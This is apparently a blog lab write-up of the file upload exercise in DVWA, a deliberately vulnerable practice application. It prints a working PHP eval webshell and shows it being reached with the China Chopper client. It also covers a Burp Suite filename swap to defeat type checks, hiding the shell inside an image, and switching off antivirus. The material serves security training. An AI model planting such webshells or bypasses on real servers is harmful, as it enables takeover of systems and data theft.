当前位置:网站首页>DVWA exercise 05 file upload file upload
DVWA exercise 05 file upload file upload
2022-07-06 14:47:00 【Fuki is on the way】
Purpose IP:192.168.142.133
Local IP:192.168.142.134
1.Security Level:Low
The code is as follows
The server did not check and process the uploaded files . I try to create a new one locally muma.php, Write a word Trojan :<?php @eval($_POST['test']);?>
( Pay attention to punctuation in English )
Upload files to dvwa
Return the path where the file was uploaded !
Go to the corresponding folder to find the file
Before connecting with a Chinese kitchen knife , There is a question . The new version of the phpstudy By default php7, Chinese kitchen knife connection failed , Switch to php5 That's it .( After changing the version , my dvwa Something went wrong , I had to repack it )
Open the Chinese kitchen knife , Right click , add to .
Address to fill in http://192.168.142.133/dvwa/hackable/uploads/muma.php
On the right is a sentence in single quotation marks
Script type selection PHP(Eval)
Right click , Virtual terminal
Input ipconfig, Check address information , But the display failed .
The target virtual machine is installed 360, A warning window will pop up when entering the system command , Default block .
hold 360 Turn it off and try again , Command executed successfully !
You can also use the file management function , View the files of the entire virtual machine , At the same time, it can upload / download / Delete and other operations .
2.Security Level:Medium
Key source code :
The upload file type restricted here is image, extension jpeg or png, And the size is smaller than 100000 byte . We can use burpsuite Modify after interception , Bypass restrictions .
Local muma.php Rename it to muma2.png
Click upload ,Burpsuite Intercept the packet , Put the filename muma2.png It is amended as follows muma2.php, Then release .
Go to the target virtual machine to view muma2.php Successfully uploaded !
3.Security Level:High
The key source code is as follows :
strrpos(string,find,start) Function return string find In another string string The last place in , If no string is found, return false, Optional parameters start Specify where to start the search .
getimagesize(string filename) The function will read the file header , Returns the length of the picture 、 Wide and so on , If there is no relevant picture file header , The function will report an error . You can see ,High Level code reads the last in the file name ”.” String after , Expect to restrict file types by file names , Therefore, the upload file name must be in the form of ”*.jpg”、”*.jpeg” 、”*.png” One of . meanwhile ,getimagesize The function also limits that the file header of the uploaded file must be of image type .
Splice a picture with the previous sentence Trojan horse file , Form a new picture .
Open the picture with Notepad , You can see a sentence at the end of the Trojan horse .
Upload succeeded , But it can't be connected with a kitchen knife . I didn't think of a solution for the time being .
Reference resources :https://www.cnblogs.com/N0r4h/p/12257848.html
https://blog.csdn.net/weixin_39190897/article/details/86772765
边栏推荐
- Numpy Quick Start Guide
- Circular queue (C language)
- Es full text index
- 《统计学》第八版贾俊平第十四章指数知识点总结及课后习题答案
- Always of SystemVerilog usage_ comb 、always_ iff
- [pointer] delete all spaces in the string s
- Mysql的事务是什么?什么是脏读,什么是幻读?不可重复读?
- Get started with Matplotlib drawing
- Statistics 8th Edition Jia Junping Chapter 7 Summary of knowledge points and answers to exercises after class
- Load balancing ribbon of microservices
猜你喜欢
数字电路基础(五)算术运算电路
Lintcode logo queries the two nearest saplings
王爽汇编语言详细学习笔记二:寄存器
ES全文索引
Quaternion -- basic concepts (Reprint)
Library management system
Markdown font color editing teaching
《统计学》第八版贾俊平第三章课后习题及答案总结
Statistics 8th Edition Jia Junping Chapter IX summary of knowledge points of classified data analysis and answers to exercises after class
"If life is just like the first sight" -- risc-v
随机推荐
servlet中 servlet context与 session与 request三个对象的常用方法和存放数据的作用域。
The salary of testers is polarized. How to become an automated test with a monthly salary of 20K?
《统计学》第八版贾俊平第十章方差分析知识点总结及课后习题答案
MySQL中什么是索引?常用的索引有哪些种类?索引在什么情况下会失效?
《统计学》第八版贾俊平第十三章时间序列分析和预测知识点总结及课后习题答案
Sword finger offer 23 - print binary tree from top to bottom
JDBC transactions, batch processing, and connection pooling (super detailed)
How does SQLite count the data that meets another condition under the data that has been classified once
[pointer] find the largest string
JDBC 的四种连接方式 直接上代码
Query method of database multi table link
Function: find the root of the equation by Newton iterative method
Fundamentals of digital circuits (I) number system and code system
JVM memory model concept
函数:用牛顿迭代法求方程的根
Intranet information collection of Intranet penetration (4)
指针:最大值、最小值和平均值
《統計學》第八版賈俊平第七章知識點總結及課後習題答案
What is an index in MySQL? What kinds of indexes are commonly used? Under what circumstances will the index fail?
Wu Enda's latest interview! Data centric reasons